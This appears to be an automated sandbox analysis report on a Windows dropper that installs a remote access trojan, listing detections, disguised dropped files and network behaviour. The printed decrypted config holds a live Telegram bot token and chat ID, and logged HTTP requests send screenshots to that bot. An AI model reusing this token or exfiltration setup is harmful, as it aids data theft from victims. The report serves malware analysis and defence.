                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeReversingLabs: Detection: 13%
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeVirustotal: Detection: 19%Perma Link
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeReversingLabs: Detection: 64%
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeVirustotal: Detection: 58%Perma Link
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\BudDliLc.logVirustotal: Detection: 19%Perma Link
                                Source: C:\Users\user\Desktop\LdxTVLQK.logReversingLabs: Detection: 66%
                                Source: C:\Users\user\Desktop\LdxTVLQK.logVirustotal: Detection: 69%Perma Link
                                Source: C:\Users\user\Desktop\MFrsFgjH.logReversingLabs: Detection: 66%
                                Source: C:\Users\user\Desktop\MFrsFgjH.logVirustotal: Detection: 69%Perma Link
                                Source: C:\Users\user\Desktop\RAtJMMZA.logVirustotal: Detection: 25%Perma Link
                                Source: C:\Users\user\Desktop\TDfrhvdw.logVirustotal: Detection: 9%Perma Link
                                Source: C:\Users\user\Desktop\WslZMRrk.logVirustotal: Detection: 25%Perma Link
                                Source: C:\Users\user\Desktop\aEtIhTbg.logVirustotal: Detection: 9%Perma Link
                                Source: C:\Users\user\Desktop\tRVOBpwv.logVirustotal: Detection: 7%Perma Link
                                Source: C:\Users\user\Desktop\tnEMlbYs.logVirustotal: Detection: 7%Perma Link
                                Multi AV Scanner detection for submitted file
                                Source: H9gMIu2HXi.exeVirustotal: Detection: 60%Perma Link
                                Source: H9gMIu2HXi.exeReversingLabs: Detection: 42%
                                Machine Learning detection for dropped file
                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeJoe Sandbox ML: detected
                                Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\tRVOBpwv.logJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\tnEMlbYs.logJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\aEtIhTbg.logJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeJoe Sandbox ML: detected
                                Source: C:\Recovery\winlogon.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\TDfrhvdw.logJoe Sandbox ML: detected
                                Sample uses string decryption to hide its real strings
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpackString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"TelegramNotifer":{"chatid":"6770966847","bottoken":"7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o","settings":" !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"False","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"}}
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpackString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-wSLzwx2vNs3ciNJLvHL2","0","xworm","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                Source: H9gMIu2HXi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDirectory created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDirectory created: C:\Program Files\Windows Multimedia Platform\8de7bf56f754b7Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDirectory created: C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDirectory created: C:\Program Files\Microsoft Office 15\8de7bf56f754b7Jump to behavior
                                Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49730 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
                                Source: H9gMIu2HXi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: H9gMIu2HXi.exe, work.exe.0.dr, dwartg.exe.3.dr
                                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.pdb source: SurrogatewebSession.exe, 00000008.00000002.1734602264.00000000036B9000.00000004.00000800.00020000.00000000.sdmp

                                Spreading

                                barindex
                                Infects executable files (exe, dll, sys, html)
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A2BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00A2BA94
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A3D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00A3D420
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_0031BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,3_2_0031BA94
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_0032D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,3_2_0032D420
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_0072A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,4_2_0072A69B
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_0073C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,4_2_0073C220
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                                Networking

                                barindex
                                Snort IDS alert for network traffic
                                Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49739 -> 104.21.79.128:80
                                Uses the Telegram API (likely for C&C communication)
                                Source: unknownDNS query: name: api.telegram.org
                                Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                                Source: global trafficHTTP traffic detected: POST /bot7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="4e636f77-7e21-4561-94a7-274b0110f910"Host: api.telegram.orgContent-Length: 98588Expect: 100-continueConnection: Keep-Alive
                                Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
                                Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
                                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: unknownDNS query: name: ipinfo.io
                                Source: unknownDNS query: name: ipinfo.io
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                                Source: unknownDNS traffic detected: queries for: ipinfo.io
                                Source: unknownHTTP traffic detected: POST /bot7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="4e636f77-7e21-4561-94a7-274b0110f910"Host: api.telegram.orgContent-Length: 98588Expect: 100-continueConnection: Keep-Alive
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.00000000033D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000379A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.00000000029C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003397000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734323133.0000000002E02000.00000002.00000001.01000000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002729000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002613000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002740000.00000004.00000800.00020000.00000000.sdmp, rGzNBWQu.log.43.dr, lKwWBiIK.log.8.drString found in binary or memory: https://api.telegram.org/bot
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o/sendPhotoX
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003349000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000377C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734323133.0000000002E02000.00000002.00000001.01000000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000377C000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002729000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002613000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002740000.00000004.00000800.00020000.00000000.sdmp, rGzNBWQu.log.43.dr, lKwWBiIK.log.8.drString found in binary or memory: https://ipinfo.io/country
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734323133.0000000002E02000.00000002.00000001.01000000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000377C000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002729000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002613000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002740000.00000004.00000800.00020000.00000000.sdmp, rGzNBWQu.log.43.dr, lKwWBiIK.log.8.drString found in binary or memory: https://ipinfo.io/ip
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49730 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2

                                System Summary

                                barindex
                                .NET source code contains very large strings
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class16.csLong String: Length: 157876
                                Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Class16.csLong String: Length: 157876
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A27AAF: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00A27AAF
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A292C60_2_00A292C6
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A350110_2_00A35011
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A462A80_2_00A462A8
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A352820_2_00A35282
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A302F70_2_00A302F7
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A382530_2_00A38253
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A313FD0_2_00A313FD
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A464D70_2_00A464D7
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A3742E0_2_00A3742E
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A355B00_2_00A355B0
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A4E6000_2_00A4E600
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A307A70_2_00A307A7
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A388AF0_2_00A388AF
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A2D8330_2_00A2D833
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A2395A0_2_00A2395A
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A4EAAE0_2_00A4EAAE
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A24A8E0_2_00A24A8E
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A52BB40_2_00A52BB4
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A2FCCC0_2_00A2FCCC
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A37DDC0_2_00A37DDC
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A22EB60_2_00A22EB6
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_003192C63_2_003192C6
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_003250113_2_00325011
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_003282533_2_00328253
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_003362A83_2_003362A8
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_003252823_2_00325282
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_003202F73_2_003202F7
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_003213FD3_2_003213FD
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_0032742E3_2_0032742E
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_003364D73_2_003364D7
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_003255B03_2_003255B0
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_0033E6003_2_0033E600
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_003207A73_2_003207A7
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_0031D8333_2_0031D833
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_003288AF3_2_003288AF
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_0031395A3_2_0031395A
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_0033EAAE3_2_0033EAAE
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_00314A8E3_2_00314A8E
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_00342BB43_2_00342BB4
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_0031FCCC3_2_0031FCCC
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_00332D403_2_00332D40
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_00327DDC3_2_00327DDC
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_00312EB63_2_00312EB6
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_0072848E4_2_0072848E
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_007240FE4_2_007240FE
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_007300B74_2_007300B7
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_007340884_2_00734088
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_007371534_2_00737153
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_007451C94_2_007451C9
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_007232F74_2_007232F7
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_007362CA4_2_007362CA
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_007343BF4_2_007343BF
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_0072F4614_2_0072F461
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_0074D4404_2_0074D440
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_0072C4264_2_0072C426
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_007377EF4_2_007377EF
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_0072286B4_2_0072286B
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_0074D8EE4_2_0074D8EE
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_007519F44_2_007519F4
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_0072E9B74_2_0072E9B7
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_00736CDC4_2_00736CDC
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_00733E0B4_2_00733E0B
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_0072EFE24_2_0072EFE2
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_00744F9A4_2_00744F9A
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 8_2_00007FFD9BAB80288_2_00007FFD9BAB8028
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 8_2_00007FFD9BABC4258_2_00007FFD9BABC425
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 8_2_00007FFD9BABC3508_2_00007FFD9BABC350
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 8_2_00007FFD9BAB8E708_2_00007FFD9BAB8E70
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 8_2_00007FFD9BAB12228_2_00007FFD9BAB1222
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 8_2_00007FFD9BAB8E7F8_2_00007FFD9BAB8E7F
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 8_2_00007FFD9BAC48EE8_2_00007FFD9BAC48EE
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 8_2_00007FFD9BC2E8428_2_00007FFD9BC2E842
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 8_2_00007FFD9BC2DA968_2_00007FFD9BC2DA96
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 8_2_00007FFD9BC3111B8_2_00007FFD9BC3111B
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeCode function: 14_2_00007FFD9BA9122214_2_00007FFD9BA91222
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeCode function: 15_2_00007FFD9BAC122215_2_00007FFD9BAC1222
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 32_2_00007FFD9BAB122232_2_00007FFD9BAB1222
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 33_2_00007FFD9BAB122233_2_00007FFD9BAB1222
                                Source: C:\Recovery\winlogon.exeCode function: 34_2_00007FFD9BAB122234_2_00007FFD9BAB1222
                                Source: C:\Recovery\winlogon.exeCode function: 35_2_00007FFD9BAB122235_2_00007FFD9BAB1222
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 40_2_00007FFD9BAB122240_2_00007FFD9BAB1222
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeCode function: 42_2_00007FFD9BAD122242_2_00007FFD9BAD1222
                                Source: C:\Recovery\winlogon.exeCode function: 43_2_00007FFD9BAC802843_2_00007FFD9BAC8028
                                Source: C:\Recovery\winlogon.exeCode function: 43_2_00007FFD9BACC42543_2_00007FFD9BACC425
                                Source: C:\Recovery\winlogon.exeCode function: 43_2_00007FFD9BACC35043_2_00007FFD9BACC350
                                Source: C:\Recovery\winlogon.exeCode function: 43_2_00007FFD9BAC8E7043_2_00007FFD9BAC8E70
                                Source: C:\Recovery\winlogon.exeCode function: 43_2_00007FFD9BAC122243_2_00007FFD9BAC1222
                                Source: C:\Recovery\winlogon.exeCode function: 43_2_00007FFD9BAC8E7F43_2_00007FFD9BAC8E7F
                                Source: C:\Recovery\winlogon.exeCode function: 43_2_00007FFD9BAD48EE43_2_00007FFD9BAD48EE
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\BudDliLc.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: String function: 0032FFD0 appears 56 times
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: String function: 0032FEFC appears 42 times
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: String function: 003307A0 appears 31 times
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: String function: 00A3FFD0 appears 56 times
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: String function: 00A407A0 appears 31 times
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: String function: 00A3FEFC appears 42 times
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: String function: 0073EB78 appears 39 times
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: String function: 0073F5F0 appears 31 times
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: String function: 0073EC50 appears 56 times
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: version.dllJump to behavior
